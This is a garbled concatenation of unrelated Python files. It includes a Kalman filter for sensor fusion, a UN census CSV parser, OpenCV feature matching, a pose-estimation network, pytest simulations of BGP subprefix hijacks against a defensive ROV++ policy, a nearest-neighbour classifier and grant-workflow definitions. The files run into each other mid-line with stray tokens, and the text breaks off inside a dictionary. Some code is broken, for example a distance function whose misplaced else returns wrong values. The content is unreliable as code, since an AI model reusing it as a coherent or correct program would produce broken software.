check_delete_perm: bool = False, check_restrict_perm: bool = False, check_promote_perm: bool = False, check_invite_perm: bool = False, check_pin_perm: bool = False) -> RawDecorator._PYRORETTYPE: """\nDecorator for handling filters Parameters: filters (:obj:`~pyrogram.filters`): Pass one or more filters to allow only a subset of messages to be passed in your function. group (``int``, *optional*): The group identifier, defaults to 0. allow_private (``bool``, *optional*): If ``False``, prohibit private chats, defaults to True. allow_bots (``bool``, *optional*): If ``False``, prohibit bot chats, defaults to True. allow_groups (``bool``, *optional*): If ``False``, prohibit group chats, defaults to True. allow_channels (``bool``, *optional*): If ``False``, prohibit channel chats, defaults to True. only_admins (``bool``, *optional*): If ``True``, client should be an admin, defaults to False. allow_via_bot (``bool``, *optional*): If ``True``, allow this via your bot, defaults to True. check_client (``bool``, *optional*): If ``True``, check client is bot or not before execute, defaults to True. check_downpath (``bool``, *optional*): If ``True``, check downpath and make if not exist, defaults to False. check_change_info_perm (``bool``, *optional*): If ``True``, check user has change_info permission before execute, defaults to False. check_edit_perm (``bool``, *optional*): If ``True``, check user has edit permission before execute, defaults to False. check_delete_perm (``bool``, *optional*): If ``True``, check user has delete permission before execute, defaults to False. check_restrict_perm (``bool``, *optional*): If ``True``, check user has restrict permission before execute, defaults to False. check_promote_perm (``bool``, *optional*): If ``True``, check user has promote permission before execute, defaults to False. check_invite_perm (``bool``, *optional*): If ``True``, check user has invite permission before execute, defaults to False. check_pin_perm (``bool``, *optional*): If ``True``, check user has pin permission before execute, defaults to False. """ return self._build_decorator( types.raw.Filter.parse(client=self, filters=filters, group=group, allow_private=allow_private, allow_bots=allow_bots, allow_groups=allow_groups, allow_channels=allow_channels, only_admins=only_admins, allow_via_bot=allow_via_bot, check_client=check_client, check_downpath=check_downpath, check_change_info_perm=check_change_info_perm, check_edit_perm=check_edit_perm, check_delete_perm=check_delete_perm, check_restrict_perm=check_restrict_perm, check_promote_perm=check_promote_perm, check_invite_perm=check_invite_perm, check_pin_perm=check_pin_perm)) Niederlage/VSLAM_UKF_SensorFusion0 import numpy as np from scipy.linalg import block_diag import scipy from Lie_Group_UKF.LG_Tool import Lie_Group, cholupdate import mathutils from scipy.spatial.transform import Rotation class RIEKF_Filter(): def __init__(self, xi0, bias0, timestamp, iter_steps, ERROR_CHECK): self.g = np.array([0, 0, -9.80665]) self.xi0 = xi0 self.bias0 = bias0 self.lg = Lie_Group() self.ERROR_CHECK = ERROR_CHECK self.iter_steps = iter_steps # init covariance p0Rot = (0.01 * np.pi / 180) ** 2 p0v = 1.e-4 p0x = 1.e-8 p0omegab = 1.e-6 p0ab = 1.e-6 P0 = np.concatenate((p0Rot * np.ones((3,)), p0v * np.ones((3,)), p0x * np.ones((3,)), p0omegab * np.ones((3,)), p0ab * np.ones((3,)))) self.P0 = np.diag(P0) self.S0 = np.linalg.cholesky(self.P0) # init pocess noise q_omega = (1.6968e-4) ** 2 * 200 q_a = (2e-3) ** 2 * 200 q_omegab = (1.9393e-5) ** 2 * 200 q_ab = (3e-3) ** 2 * 200 Q0 = np.concatenate( (q_omega * np.ones((3,)), q_a * np.ones((3,)), q_omegab * np.ones((3,)), q_ab * np.ones((3,)))) self.Qc = np.diag(np.sqrt(Q0)) # first round cholesky self.W = np.eye(3) * (2e-3) ** 2 # init trajectory quat0 = mathutils.Matrix(np.eye(3)).to_quaternion() v0 = np.array([0., 0., 0.]) x0 = np.array([0., 0., 0.]) u0 = np.zeros((6,)) self.trajectory = np.concatenate((quat0, v0, x0, u0)) # init observetime self.timestamp = timestamp self.obsTime = np.zeros((len(timestamp),)) self.obsTime[::10] = 1 def iekfPropagation(self, chi_i, bias_i, P_i, u_i, Q_i, dt_i): # IEKF on Lie Groups # N_lm = chi_i[:, 5:].shape[1] N_P = len(P_i) N_Q = len(Q_i) # state propagation omega_i = u_i[:3] acc_i = u_i[3:] omega_b = bias_i[:3] acc_b = bias_i[3:] Rot_i = chi_i[:3, :3] @ self.lg.expSO3((omega_i - omega_b) * dt_i) delta_a_i = Rot_i @ (acc_i - acc_b) v_i = chi_i[:3, 3] + (delta_a_i + self.g) * dt_i x_i = chi_i[:3, 4] + v_i * dt_i # covariance propagation F_i = np.eye(N_P) F_i[:3, 9:12] = - Rot_i * dt_i F_i[3:6, :3] = self.lg.hat_operator(self.g) * dt_i F_i[3:6, 9:12] = -self.lg.hat_operator(v_i) @ Rot_i * dt_i F_i[3:6, 12:15] = -Rot_i * dt_i F_i[6:9, :3] = self.lg.hat_operator(self.g) * dt_i * dt_i F_i[6:9, 3:6] = np.eye(3) * dt_i F_i[6:9, 9:12] = -self.lg.hat_operator(x_i) @ Rot_i * dt_i F_i[6:9, 12:15] = -Rot_i * dt_i * dt_i # if N_lm > 0: # for i in range(N_lm): # p_i = chi_i[:3, i + 9] # F_i[15 + 3 * i:18 + 3 * i, 9:12] = -self.lg.hat_operator(p_i) @ Rot_i * dt_i G_i = np.zeros((N_P, N_Q)) G_i[:3, :3] = Rot_i G_i[:3, 6:9] = Rot_i * dt_i G_i[3:6, :3] = self.lg.hat_operator(v_i) * Rot_i G_i[3:6, 3:6] = Rot_i G_i[3:6, 6:9] = self.lg.hat_operator(v_i) * Rot_i * dt_i * dt_i G_i[3:6, 9:12] = Rot_i * dt_i * dt_i G_i[6:9, :3] = self.lg.hat_operator(x_i) * Rot_i G_i[6:9, 3:6] = Rot_i * dt_i G_i[6:9, 6:9] = self.lg.hat_operator(x_i) * Rot_i * dt_i * dt_i * dt_i G_i[6:9, 9:12] = Rot_i * dt_i * dt_i * dt_i G_i[9:15, 6:12] = np.eye(6) P_predict = F_i @ P_i @ F_i.T + G_i @ (Q_i * dt_i) @ G_i.T * dt_i chi_predict = self.lg.state2chi(Rot_i, v_i, x_i, None) return chi_predict, P_predict def iekfUpdate(self, chi_i, bias_i, P_i, y_i, R_i): l_y = len(y_i) l_P = len(P_i) # l_lm = len(chi_i[:, 5:]) l_R = len(R_i) # Rc = np.linalg.cholesky(np.kron(np.eye(k), R_i)) bias_update = np.zeros((6,)) Rot_i = chi_i[:3, :3] x_i = chi_i[:3, 4] # d_1 = np.array([0, 0, 0, 0, 1]) H_i = np.zeros((l_y, l_P)) H_i[:3, 6:9] = np.eye(3) # H_i[:3, :3] = 0.6 * self.lg.hat_operator(y_i) # if l_lm > 0: # lm_i = chi_i[:3, 5:] # Pnorm = np.linalg.norm(P_i) # y_predict = Rot_i.T @ (y_i - x_i) y_predict = x_i S_i = H_i @ P_i @ H_i.T + R_i K_i = P_i @ H_i.T @ np.linalg.inv(S_i) P_corrected = (np.eye(l_P) - K_i @ H_i) @ P_i # K_i_reduced = K_i[6:9, :] xibar = (K_i @ (y_i - y_predict)[:, None]).flatten() # innovation bias_update[:3] = bias_i[:3] + xibar[9:12] bias_update[3:] = bias_i[3:] + xibar[12:15] xibar = xibar[:9] # Update mean state chi_next = self.lg.expSE3(xibar) @ chi_i return chi_next, bias_update, P_corrected def updateTraj(self, traj, chi, u): Rot, v, x, _p = self.lg.chi2state(chi) quat = np.array(mathutils.Matrix(Rot).to_quaternion()) state_rows = np.concatenate((quat, v, x, u)) traj = np.vstack((traj, state_rows)) return traj def run_iekf(self, omega, acc, y_mess, test_quat): # init all t_i = 0 trajI = self.trajectory P_I = self.P0 Qc = self.Qc bias_i = self.bias0 RotI = self.lg.expSO3(self.xi0[:3]) vI = self.xi0[3:6] xI = self.xi0[6:9] chiI = self.lg.state2chi(RotI, vI, xI, None) errorlist = np.zeros((1, 3)) for step_i in range(1, self.iter_steps): # propagation omega_i = omega[:, step_i] acc_i = acc[:, step_i] dt = self.timestamp[step_i] - self.timestamp[step_i - 1] chiI_last = np.copy(chiI) # motion dynamic # dRotI = self.lg.expSO3((omega_i - bias_i[:3]) * dt) # RotI = RotI @ dRotI # dvI = (RotI @ (acc_i - bias_i[3:]) + self.g) * dt # vI = vI + dvI # xI = xI + vI * dt # chiI_predict = self.lg.state2chi(RotI, vI, xI, None) u_i = np.hstack((omega_i, acc_i)) chiI_predict, P_I = self.iekfPropagation(chiI_last, bias_i, P_I, u_i, Qc, dt) normP_I = np.linalg.norm(P_I) # calculate propagation error test_rot = mathutils.Quaternion(test_quat[:, step_i]) test_theta = Rotation.from_matrix(np.array(test_rot.to_matrix())) test_theta = test_theta.as_euler('zyx', degrees=True) cal_theta = Rotation.from_matrix(chiI_predict[:3, :3]) cal_theta = cal_theta.as_euler('zyx', degrees=True) x_error = np.linalg.norm(y_mess[:, step_i] - chiI_predict[:3, 4]) if self.ERROR_CHECK: temp_error = test_theta - cal_theta else: theta_error = np.linalg.norm(test_theta - cal_theta) temp_error = np.array([step_i, theta_error, x_error]) errorlist = np.vstack((errorlist, temp_error)) # measurement and update if self.obsTime[step_i] == 1: chiI, bias_i, P_I = self.iekfUpdate(chiI_predict, bias_i, P_I, y_mess[:, t_i], self.W) trajI = self.updateTraj(trajI, chiI, u_i) t_i += 1 else: trajI = self.updateTraj(trajI, chiI_predict, u_i) chiI = chiI_predict return trajI, errorlist if __name__ == '__main__': dtt = 0.01 10-100 import sys import re import json import argparse from collections import defaultdict, Counter # --------------------------------------------------------- # Globals UNdata = "data/UNdata_Export_20200229_174614791.csv" Delta = 10 # --------------------------------------------------------- # Functions def parse_table(rdr, rowkey="Country or Area"): hdr = [s.strip('"') for s in rdr.readline().strip().split(',')] I = hdr.index(rowkey) tbl = defaultdict(list) hdr.pop(I) for line in rdr: if line == '\n' or '"footnoteSeqID"' in line: break elts = re.split(r',(?=")', line.strip('\n')) key = elts.pop(I).strip('"') tbl[key].append({h:elt for h, elt in zip(hdr, elts)}) return dict(tbl) def compile_distribution(tbl): ages = {k:[] for k in tbl.keys()} bps = list(range(Delta, 80+Delta, Delta)) for cntry, data in tbl.items(): # Need to deal with all possibe cases of age entries here num = Counter([d['Age'].strip('"') for d in data if d['Age'] != '"Total"']) if num["0 - 4"] > 0: # Multiple years can be present w/in data set. # If so, choose the latest if num["0 - 4"] == 1: cnts = { d['Age'].strip('"') : int(float(d['Value'].strip('"'))) for d in data } else: # TODO: Check that all key/value pairs are represented twice... src_yr = max([ int(d['Source Year'].strip('"')) for d in data ]) cnts = { d['Age'].strip('"') : int(float(d['Value'].strip('"'))) for d in data if int(d['Source Year'].strip('"')) == src_yr } ages[cntry] = [0 for _ in range(len(bps)+1)] a, i = 0, 0 while a < 200: if i < len(bps) and a >= bps[i]: i += 1 if (s := f"{a} - {a+4}") in cnts: ages[cntry][i] += cnts[s] a += 5 continue elif (s := f"{a} +") in cnts: ages[cntry][i] += cnts[s] break elif num["0"] == 1: cnts = { d['Age'].strip('"') : int(float(d['Value'].strip('"'))) for d in data } a, i = 0, 0 ages[cntry] = [0 for _ in range(len(bps)+1)] while a < 200: if i < len(bps) and a >= bps[i]: i += 1 if str(a) in cnts: ages[cntry][i] += cnts[str(a)] else: # NOTE: Assumes age distribution in file is in 5 yr breaks if (s := f"{a} - {a+4}") in cnts: ages[cntry][i] += cnts[s] a += 5 continue elif (s := f"{a} +") in cnts: ages[cntry][i] += cnts[s] break a += 1 else: print(f"Could not parse data for country '{cntry}'", file=sys.stderr) del ages[cntry] return ages, [0] + bps def canonicalize(ages, bps): data = {} keys = [f"{b}-{bps[i+1]-1}" for i, b in enumerate(bps[:-1])] + [f"{bps[-1]}+"] for cntry, vals in ages.items(): data[cntry] = {k:val for k, val in zip(keys, vals)} return data def concatenate(*tbls): full_tbl = tbls[0] Ks = set(full_tbl.keys()) for tbl in tbls[1:]: for new_cntry in set(tbl.keys()).difference(set(full_tbl.keys())): full_tbl[new_cntry] = tbl[new_cntry] return full_tbl # --------------------------------------------------------- # Main point of entry parser = argparse.ArgumentParser(description="Convert UN age csv into our json format", usage='''parse_age_dists.py [, ...] Outputs json formatted distribution to standard output. If more than one path is given, secondary csv files are concatenated to the first. ''') parser.add_argument("files", metavar="[path(s) to file]", type=str, nargs='+', help="path to csv file with UN age distributions") if __name__ == "__main__": args = parser.parse_args() tbls = [] for path in sorted(args.files): print(f"Analyzing {path}", file=sys.stderr) if not path.endswith(".csv"): print(f"Input must be a csv formatted file. Recieved {path.split('.')[-1]}", file=sys.stderr) exit(1) tbls.append(parse_table(open(path))) tbl = concatenate(*tbls) print(f"Number of countries: {len(tbl)}", file=sys.stderr) data = canonicalize(*compile_distribution(tbl)) json.dump(data, sys.stdout) import cv2 from matplotlib import pyplot as plt # Load the images. img0 = cv2.imread('../images/nasa_logo.png', cv2.IMREAD_GRAYSCALE) img1 = cv2.imread('../images/kennedy_space_center.jpg', cv2.IMREAD_GRAYSCALE) # Perform ORB feature detection and description. orb = cv2.ORB_create() kp0, des0 = orb.detectAndCompute(img0, None) kp1, des1 = orb.detectAndCompute(img1, None) # Perform brute-force KNN matching. bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=False) pairs_of_matches = bf.knnMatch(des0, des1, k=2) # Sort the pairs of matches by distance. pairs_of_matches = sorted(pairs_of_matches, key=lambda x:x[0].distance) # Draw the 25 best pairs of matches. img_pairs_of_matches = cv2.drawMatchesKnn( img0, kp0, img1, kp1, pairs_of_matches[:25], img1, flags=cv2.DRAW_MATCHES_FLAGS_NOT_DRAW_SINGLE_POINTS) # Show the pairs of matches. plt.imshow(img_pairs_of_matches) plt.show() # Apply the ratio test. matches = [x[0] for x in pairs_of_matches if len(x) > 1 and x[0].distance < 0.8 * x[1].distance] # Draw the best 25 matches. img_matches = cv2.drawMatches( img0, kp0, img1, kp1, matches[:25], img1, flags=cv2.DRAW_MATCHES_FLAGS_NOT_DRAW_SINGLE_POINTS) # Show the matches. plt.imshow(img_matches) plt.show() # ------------------------------------------------------------------------------ # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. # Written by () # ------------------------------------------------------------------------------ from __future__ import absolute_import from __future__ import division from __future__ import print_function import torch import torch.nn as nn class ChannelWiseFC(nn.Module): def __init__(self, size): super(ChannelWiseFC, self).__init__() self.weight = nn.Parameter(torch.Tensor(size, size)) self.weight.data.uniform_(0, 0.1) def forward(self, input): N, C, H, W = input.size() input_reshape = input.reshape(N * C, H * W) output = torch.matmul(input_reshape, self.weight) output_reshape = output.reshape(N, C, H, W) return output_reshape class Aggregation(nn.Module): def __init__(self, cfg, weights=[0.4, 0.2, 0.2, 0.2]): super(Aggregation, self).__init__() NUM_NETS = 12 # 12 because each view is fused with 3 other views (?) size = int(cfg.NETWORK.HEATMAP_SIZE[0]) self.weights = weights self.aggre = nn.ModuleList() for i in range(NUM_NETS): self.aggre.append(ChannelWiseFC(size * size)) def sort_views(self, target, all_views): indicator = [target is item for item in all_views] new_views = [target.clone()] for i, item in zip(indicator, all_views): if not i: new_views.append(item.clone()) return new_views def fuse_with_weights(self, views): target = torch.zeros_like(views[0]) for v, w in zip(views, self.weights): target += v * w return target def forward(self, inputs): index = 0 outputs = [] nviews = len(inputs) for i in range(nviews): sorted_inputs = self.sort_views(inputs[i], inputs) warped = [sorted_inputs[0]] for j in range(1, nviews): fc = self.aggre[index] fc_output = fc(sorted_inputs[j]) warped.append(fc_output) index += 1 output = self.fuse_with_weights(warped) outputs.append(output) return outputs class MultiViewPose(nn.Module): def __init__(self, PoseResNet, Aggre, CFG): super(MultiViewPose, self).__init__() self.config = CFG self.resnet = PoseResNet self.aggre_layer = Aggre def forward(self, views): if isinstance(views, list): single_views = [] for view in views: heatmaps = self.resnet(view) single_views.append(heatmaps) multi_views = [] if self.config.NETWORK.AGGRE: multi_views = self.aggre_layer(single_views) return single_views, multi_views else: return self.resnet(views) def get_multiview_pose_net(resnet, CFG): Aggre = Aggregation(CFG) model = MultiViewPose(resnet, Aggre, CFG) return model # -*- coding: utf-8 -*- from twisted.internet import defer from jsonrpc import errors class Add(object): # ... def __init__(self, request, *args, **kwargs): self.x = kwargs['x'] self.y = kwargs['y'] def __call__(self): # raise errors.ParseError() return self.x + self.y class Sub(object): # ... def __init__(self, request, *args, **kwargs): self.x = kwargs['x'] self.y = kwargs['y'] @defer.inlineCallbacks def __call__(self): yield # raise errors.ParseError() defer.returnValue(self.x - self.y) #!/usr/bin/env python3 # -*- coding: utf-8 -*- """This file contains system tests for the extrapolator. For speciifics on each test, see the docstrings under each function. """ import pytest from .graph_tester import Graph_Tester #from ..tables import Hijack from ....enums import Non_Default_Policies, Policies, Data_Plane_Conditions as Conds from ...attacks.attack_classes import Subprefix_Hijack from ...attacks.attack import Attack __author__ = "" __credits__ = [""] __Lisence__ = "BSD" __maintainer__ = "" __email__ = "" __status__ = "Development" class Test_Special_Cases(Graph_Tester): """Tests all example graphs within our paper.""" def test_v2_customer_blackhole(self): r""" 55 / \ 44 3 / \ 666 77 Here we're testing that v2 ASes should not create blackhole announcements for attack announcements received from a customer, but rather just drop and blackhole the announcement. That can be capture here as 55 and 44 implementing ASes. AS 44 should not have a blackhole, but AS 55 should have a blackhole. """ attack_types = [Subprefix_Hijack] adopt_policies = [Non_Default_Policies.ROVPP_V2] peer_rows = [] provider_customer_rows = [[55, 44], [55, 3], [3, 666], [3, 77]] # Set adopting rows bgp_ases = [3, 666, 77] rov_adopting_ases = [] rovpp_adopting_ases = [55, 44] adopting_rows = [] for bgp_as in bgp_ases: adopting_rows.append([bgp_as, Policies.DEFAULT.value, False]) # for adopting_as in rov_adopting_ases: # adopting_rows.append([adopting_as, Policies.ROV.value, True]) for adopting_as in rovpp_adopting_ases: adopting_rows.append([adopting_as, Policies.ROVPP_V2.value, True]) attacker = 666 victim = 77 exr_output = [ {'asn': 77, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 64514}, {'asn': 77, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64514}, {'asn': 44, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 55}, {'asn': 55, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 3}, {'asn': 55, 'origin': 64512, 'prefix': '1.2.3.0/24', 'received_from_asn': 64512}, {'asn': 3, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 77}, {'asn': 3, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 666}, {'asn': 666, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 3}, {'asn': 666, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64513} ] self._test_graph(attack_types=attack_types, adopt_policies=adopt_policies, peer_rows=peer_rows, provider_customer_rows=provider_customer_rows, adopting_rows=adopting_rows, attacker=attacker, victim=victim, exr_output=exr_output) def test_v2_customer_peer_and_provider(self): r""" 55 --- 88 / \ \ 22 33 44 / \ 666 77 """ attack_types = [Subprefix_Hijack] adopt_policies = [Non_Default_Policies.ROVPP_V2] peer_rows = [[55, 88]] provider_customer_rows = [[55, 22], [55, 33], [33, 666], [33, 77], [88, 44]] # Set adopting rows bgp_ases = [33, 22, 44, 666, 77, 88] rov_adopting_ases = [] rovpp_adopting_ases = [55] adopting_rows = [] for bgp_as in bgp_ases: adopting_rows.append([bgp_as, Policies.DEFAULT.value, False]) for adopting_as in rovpp_adopting_ases: adopting_rows.append([adopting_as, Policies.ROVPP_V2.value, True]) attacker = 666 victim = 77 exr_output = [ {'asn': 666, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 33}, {'asn': 666, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64513}, {'asn': 44, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 88}, {'asn': 77, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 64514}, {'asn': 77, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 64514}, {'asn': 55, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 33}, {'asn': 55, 'origin': 64512, 'prefix': '1.2.3.0/24', 'received_from_asn': 64512}, {'asn': 22, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 55}, {'asn': 88, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 55}, {'asn': 33, 'origin': 77, 'prefix': '1.2.0.0/16', 'received_from_asn': 77}, {'asn': 33, 'origin': 666, 'prefix': '1.2.3.0/24', 'received_from_asn': 666} ] self._test_graph(attack_types=attack_types, adopt_policies=adopt_policies, peer_rows=peer_rows, provider_customer_rows=provider_customer_rows, adopting_rows=adopting_rows, attacker=attacker, victim=victim, exr_output=exr_output) import math import numpy as np def prediction_all(image, array): inf = math.inf acc = 0 # initiale index for i in range(0, len(array)): d = distance(image, array[i]) if inf > d: inf = d acc = i # suchen wir die aktuell kleinste Anstand mit ihre Index return array[acc][0] #d = distance(array[i], image) def smallassist(image, array): inf = math.inf acc = 0 for i in range(0, len(array)): d = distance(image, array[i]) if inf > d: inf = d acc = i return acc def secsmall(image, array): smallindex = smallassist(image,array) inf = math.inf acc = 0 for i in range(0,len(array)): if i == smallindex: i += 1 d = distance(image, array[i]) if inf > d: inf = d acc = i return array[acc][0] def secsmallassist(image,array): smallindex = smallassist(image, array) inf = math.inf acc = 0 for i in range(0, len(array)): if i == smallindex: i += 1 d = distance(image, array[i]) if inf > d: inf = d acc = i return acc def dritsmall(image,array): smallindex =smallassist(image,array) secsmallindex =secsmallassist(image,array) inf=math.inf acc=0 for i in range(0,len(array)): if i == smallindex: i += 1 elif i==secsmallindex: i=i+1 d = distance(image, array[i]) if inf > d: inf = d acc = i return array[acc][0] def distance(array1, array2): length = len(array1) if length != len(array2): print('error1') dist = 0 for i in range(1, length): dist += math.pow((array1[i] - array2[i]), 2) else: dist = math.sqrt(dist) # jede Matrix ist 16*16, mit 256+1 Index, die Abstand wird gerechnet return dist def prediction(data): result = [] for i in range(0, len(data)): tmp = int(prediction_all(data[i], data)) #tmp = int(prediction_all(data, data[i])) if (tmp == 0): tmp = -1 result.append(tmp) return np.transpose(np.matrix(result)) 10-100 import itertools from collections import defaultdict from enum import Enum from django.conf import settings from django.utils.text import slugify from django.utils.translation import gettext as _ """ This file defines classes which allow you to compose workflows based on the following structure: Workflow -> Stage -> Phase -> Action Current limitations: * Changing the name of a phase will mean that any object which references it cannot progress. [will be fixed when streamfield, may require intermediate fix prior to launch] * Do not reorder without looking at workflow automations steps in form_valid() in hypha/apply/funds/views.py and hypha/apply/review/views.py. """ class UserPermissions(Enum): STAFF = 1 ADMIN = 2 LEAD = 3 APPLICANT = 4 class Workflow(dict): def __init__(self, name, admin_name, **data): self.name = name self.admin_name = admin_name super().__init__(**data) def __str__(self): return self.name @property def stages(self): stages = [] for phase in self.values(): if phase.stage not in stages: stages.append(phase.stage) return stages @property def stepped_phases(self): phases = defaultdict(list) for phase in list(self.values()): phases[phase.step].append(phase) return phases def phases_for(self, user=None): # Grab the first phase for each step - visible only, the display phase return [ phase for phase, *_ in self.stepped_phases.values() if not user or phase.permissions.can_view(user) ] def previous_visible(self, current, user): """Find the latest phase that the user has view permissions for""" display_phase = self.stepped_phases[current.step][0] phases = self.phases_for() index = phases.index(display_phase) for phase in phases[index - 1::-1]: if phase.permissions.can_view(user): return phase class Phase: """ Phase Names: display_name = phase name displayed to staff members in the system public_name = phase name displayed to applicants in the system future_name = phase_name displayed to applicants if they haven't passed this stage """ def __init__(self, name, display, stage, permissions, step, public=None, future=None, transitions=dict()): self.name = name self.display_name = display if public and future: raise ValueError("Cant provide both a future and a public name") self.public_name = public or self.display_name self.future_name_staff = future or self.display_name self.future_name_public = future or self.public_name self.stage = stage self.permissions = Permissions(permissions) self.step = step # For building transition methods on the parent self.transitions = {} default_permissions = {UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN} for transition_target, action in transitions.items(): transition = dict() try: transition['display'] = action.get('display') except AttributeError: transition['display'] = action transition['permissions'] = default_permissions else: transition['method'] = action.get('method') conditions = action.get('conditions', '') transition['conditions'] = conditions.split(',') if conditions else [] transition['permissions'] = action.get('permissions', default_permissions) self.transitions[transition_target] = transition def __str__(self): return self.display_name def __repr__(self): return f'' class Stage: def __init__(self, name, has_external_review=False): self.name = name self.has_external_review = has_external_review def __str__(self): return self.name def __repr__(self): return f'' class Permissions: def __init__(self, permissions): self.permissions = permissions def can_do(self, user, action): checks = self.permissions.get(action, list()) return any(check(user) for check in checks) def can_edit(self, user): return self.can_do(user, 'edit') def can_review(self, user): return self.can_do(user, 'review') def can_view(self, user): return self.can_do(user, 'view') staff_can = lambda user: user.is_apply_staff # NOQA applicant_can = lambda user: user.is_applicant # NOQA reviewer_can = lambda user: user.is_reviewer # NOQA partner_can = lambda user: user.is_partner # NOQA community_can = lambda user: user.is_community_reviewer # NOQA def make_permissions(edit=list(), review=list(), view=[staff_can, applicant_can, reviewer_can, partner_can, ]): return { 'edit': edit, 'review': review, 'view': view, } no_permissions = make_permissions() default_permissions = make_permissions(edit=[staff_can], review=[staff_can]) hidden_from_applicant_permissions = make_permissions(edit=[staff_can], review=[staff_can], view=[staff_can, reviewer_can]) reviewer_review_permissions = make_permissions(edit=[staff_can], review=[staff_can, reviewer_can]) community_review_permissions = make_permissions(edit=[staff_can], review=[staff_can, reviewer_can, community_can]) applicant_edit_permissions = make_permissions(edit=[applicant_can, partner_can], review=[staff_can]) staff_edit_permissions = make_permissions(edit=[staff_can]) Request = Stage('Request', False) RequestExt = Stage('RequestExt', True) RequestCom = Stage('RequestCom', True) Concept = Stage('Concept', False) Proposal = Stage('Proposal', True) DRAFT_STATE = 'draft' INITIAL_STATE = 'in_discussion' SingleStageDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': Request, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'more_info': _('Request More Information'), 'internal_review': _('Open Review'), 'determination': _('Ready For Determination'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Application Received'), 'stage': Request, 'permissions': default_permissions, }, 'more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'determination': _('Ready For Determination'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('More information required'), 'stage': Request, 'permissions': applicant_edit_permissions, }, }, { 'internal_review': { 'transitions': { 'post_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': Request, 'permissions': default_permissions, }, }, { 'post_review_discussion': { 'transitions': { 'post_review_more_info': _('Request More Information'), 'determination': _('Ready For Determination'), 'internal_review': _('Open Review (revert)'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': Request, 'permissions': hidden_from_applicant_permissions, }, 'post_review_more_info': { 'transitions': { 'post_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, 'determination': _('Ready For Determination'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('More information required'), 'stage': Request, 'permissions': applicant_edit_permissions, }, }, { 'determination': { 'transitions': { 'post_review_discussion': _('Ready For Discussion (revert)'), 'almost': _('Accept but additional info required'), 'accepted': _('Accept'), 'rejected': _('Dismiss'), }, 'display': _('Ready for Determination'), 'permissions': hidden_from_applicant_permissions, 'stage': Request, }, }, { 'accepted': { 'display': _('Accepted'), 'future': _('Application Outcome'), 'stage': Request, 'permissions': staff_edit_permissions, }, 'almost': { 'transitions': { 'accepted': _('Accept'), 'post_review_discussion': _('Ready For Discussion (revert)'), }, 'display': _('Accepted but additional info required'), 'stage': Request, 'permissions': applicant_edit_permissions, }, 'rejected': { 'display': _('Dismissed'), 'stage': Request, 'permissions': no_permissions, }, }, ] SingleStageExternalDefinition = [ { DRAFT_STATE: { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT}, 'method': 'create_revision', }, }, 'display': _('Draft'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, } }, { INITIAL_STATE: { 'transitions': { 'ext_more_info': _('Request More Information'), 'ext_internal_review': _('Open Review'), 'ext_determination': _('Ready For Determination'), 'ext_rejected': _('Dismiss'), }, 'display': _('Need screening'), 'public': _('Application Received'), 'stage': RequestExt, 'permissions': default_permissions, }, 'ext_more_info': { 'transitions': { INITIAL_STATE: { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, UserPermissions.ADMIN}, 'method': 'create_revision', }, }, 'display': _('More information required'), 'stage': RequestExt, 'permissions': applicant_edit_permissions, }, }, { 'ext_internal_review': { 'transitions': { 'ext_post_review_discussion': _('Close Review'), INITIAL_STATE: _('Need screening (revert)'), }, 'display': _('Internal Review'), 'public': _('{org_short_name} Review').format(org_short_name=settings.ORG_SHORT_NAME), 'stage': RequestExt, 'permissions': default_permissions, }, }, { 'ext_post_review_discussion': { 'transitions': { 'ext_post_review_more_info': _('Request More Information'), 'ext_external_review': _('Open External Review'), 'ext_determination': _('Ready For Determination'), 'ext_internal_review': _('Open Internal Review (revert)'), 'ext_rejected': _('Dismiss'), }, 'display': _('Ready For Discussion'), 'stage': RequestExt, 'permissions': hidden_from_applicant_permissions, }, 'ext_post_review_more_info': { 'transitions': { 'ext_post_review_discussion': { 'display': _('Submit'), 'permissions': {UserPermissions.APPLICANT, UserPermissions.STAFF, UserPermissions.LEAD, 